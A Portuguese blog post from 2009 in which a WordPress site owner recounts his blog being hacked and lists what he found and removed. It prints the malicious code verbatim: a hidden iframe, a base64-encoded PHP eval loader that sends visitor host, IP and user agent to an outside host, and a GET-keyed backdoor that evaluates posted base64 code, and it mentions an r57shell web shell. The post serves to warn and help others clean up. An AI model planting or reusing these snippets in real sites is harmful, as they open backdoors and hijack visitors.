Posts Tagged ‘hacked’

Recomeço…

Friday, April 10th, 2009

Há alguns dias, notei algumas diferenças com relação ao meu blog e principalmente no meu pagerank, que antes era de modestos 4/10.

Antes, quando você entrava no google.com.br e digitava “programador php”, meu site era o primeiro da lista. De tempos em tempos costumo verificar se esta situação se mantem e na minha última tentativa, espanto! Meu blog simplesmente sumiu do google!
Chequei meu pagerank e outro susto: estava zerado!

O que diabos estava acontecendo?

Então comecei a checar os códigos do wordpress e encontrei alguns, problemas:

1 – havia um iframe no final das minhas páginas:

<iframe src=”http:// google – stat .com /tomi/?t=2″ width=0 height=0 style=”hidden” frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
(coloquei os espaços no domímio porque não quero gerar mais tráfego para este indivíduo)

Para remover: se você tem acesso SSH ao seu servidor, você pode remover este iframe de todas as páginas com o comando:

find ./* -type f -exec sed -i 's/<iframe src="http:\/\/google - stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;
(remova os espaços no domínio)

Ao entrar no meu blog, aparecia um PDF para fazer download. WTF?! Era culpa deste iframe, que injetava um vírus no documento.

2 – o .htaccess foi modificado

Meu .htaccess foi modificado. Quando qualquer bot de engine de busca acessava meu site, ele era automaticamente redirecionado para outro site. Fiquei tão P* que deletei e não tenho aqui o conteúdo do .htaccess

3 – havia um código php malicioso no index.php que gerava links aleatórios para outros sites.

eval(base64_decode(‘JGNoPWN1cmxfaW5pdCgiaHR0cDovL3Vzci01Mi5hZHNsLm1kL2lu
YzIucGhwP2hvc3Q9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfSE9TVCJdKS4iJmlwP
SIudXJsZW5jb2RlKCRfU0VSVkVSWyJSRU1PVEVfQUREUiJdKS4iJmFnZW50PSIudXJsZW
5jb2RlKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSkpOyBjdXJsX3NldG9wdCgkY2gs
IENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7ICRyZXN1bHQ9Y3VybF9leGVjKCRjaCk7
IGN1cmxfY2xvc2UoJGNoKTsgcHJpbnQgJHJlc3VsdDs=’));

O resultado do decode é este:

$ch=curl_init(“http://usr-52. adsl .md/inc2.php?host=”.urlencode($_SERVER[“HTTP_HOST”]).”&ip=”.urlencode($_SERVER[“REMOTE_ADDR”]).”&agent=”.urlencode($_SERVER[“HTTP_USER_AGENT”])); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result=curl_exec($ch); curl_close($ch); print $result;

4 – em diversas páginas encontrei mais códigos maliciosos que poderiam executar qualquer coisa enviada pelo indivíduo que fez isso em meu blog.

Eis aqui como ele se parece:

<?php if($_GET[‘9e26465b24966559’]==”a2bc87015a3f0dc6″){ eval(base64_decode($_POST[‘file’])); exit; } ?>

Este trecho do código aparece em muitas páginas e o nome e valor da variável $_GET sempre muda.

Faça uma busca nos seus códigos por eval(base64_decode e se encontrar algo, remova imediatamente.

5 – havia um arquivo wp-content/cache.php

Este arquivo era simplesmente uma shell escrita em php, chamada r57shell
Busque este arquivo ou o nome desta shell e se encontrar… é meu querido… bem vindo ao clube.

É bem provável que outras coisas tenham sido adicionadas, então eu decidi limpar tudo e reinstalar o WP, porém agora com a última versão.

Ainda não sei como este cara teve acesso, mas provavelmente foi alguma vulnerabilidade no WP ou algum plugin que eu estava utilizando.
(mas ainda tenho dúvidas se não foi algo com a dreamhost, pois eles mudaram meus sites de servidor recentemente)

Se você utiliza wordpress, recomendo que utilize este plugin: http://wordpress.org/extend/plugins/exploit-scanner/

Enfim… o que me resta agora é tentar recuperar meu pagerank.

Abraço!